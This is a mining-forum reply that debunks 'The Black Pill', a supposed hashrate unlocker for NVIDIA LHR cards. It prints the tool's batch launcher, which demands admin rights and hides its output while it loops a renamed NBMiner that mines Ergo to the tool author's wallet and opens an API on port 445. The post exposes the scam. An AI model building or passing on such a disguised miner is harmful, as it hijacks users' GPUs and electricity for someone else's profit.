Post
Topic
Board Mining (Altcoins)
Merits 21 from 2 users
Re: The Black Pill hashrate enlarger Tool v1.01 for NVIDIA LHR cards
by
Eliovp
on 26/05/2022, 10:42:11 UTC
⭐ Merited by El duderino_ (20) ,P00P135 (1)
You fell deep sp_

Here is the script that launches "the pill".

Code:
@ECHO OFF 2>nul >nul

@nvidia-smi -h >nul 2>&1
IF %ERRORLEVEL%==9009 (
echo error: Nvidia driver not installed or not compatible. & goto :out
)
net session >nul 2>&1
if %errorLevel% NEQ 0 (
echo error: Run as admin. & goto :out
)   
set test=%1
for /f "delims=0987654321," %%a in (%1) do echo error: Invalid device id's & goto :out

@nvidia-smi

set devices=
set devices2=
if [%test%]==[] ( set test="ALL") else ( set test=%~1 & set devices=-i %~1 & set devices2=-d %~1)

@ECHO Devices selected:
@nvidia-smi --query-gpu=index,gpu_name,memory.total --format=csv %devices%
@nvidia-smi --query-gpu=index,gpu_name,memory.total --format=csv %devices% > gpus.csv

for /f "skip=1 tokens=*" %%a in (gpus.csv) do (
  for /f "tokens=3 delims=," %%b in ("%%a") do (
for /f "tokens=1" %%c IN ("%%b") do (
if %%c LSS 8000 (echo error: 8gb gpu memory required. Use the device selection option to deselect cards. & goto :out)
)
  )
)

@ECHO %time% Welcome to the The Black Pill hashrate enlarger tool. v1.0
@ECHO %time%  Keep this window open while mining to unlock LHR
@ECHO %time%  Happy Mining!
:loop
Black.x -a ergo -i 1 -o stratum+ssl://ergo-eu1.nanopool.org:11433 -o1 -o stratum+ssl://us-erg.2miners.com:18888 -o2 stratum+ssl://erg.2miners.com:18888 -u 9fVeky1VvXiA5w7gBqpH5M1HjArR2aAnZb8B92YbeM2dosgvvtt -u1 9fVeky1VvXiA5w7gBqpH5M1HjArR2aAnZb8B92YbeM2dosgvvtt -u2 9fVeky1VvXiA5w7gBqpH5M1HjArR2aAnZb8B92YbeM2dosgvvtt %devices2% --no-interrupt --share-check 0 --no-color --platform 1 --log-no-job --log-cycle 100000 --api 0.0.0.0:445 >nul 2>&1

@ECHO ON >NUL
@ECHO %time% FAILED TO UNLOCK, RETRYING...
@ECHO OFF >NUL
timeout 1 >NUL
goto :loop >NUL

:out
pause


As you can see at the bottom, our friend here launches "Black.x" and does some ergo mining (not very successful if you check his stats).

The absolutely hilarious part of all of this, is that Black.x == Nbminer v41.5.
Yeah, no shit.
This guy knows no shame.

How low can you go?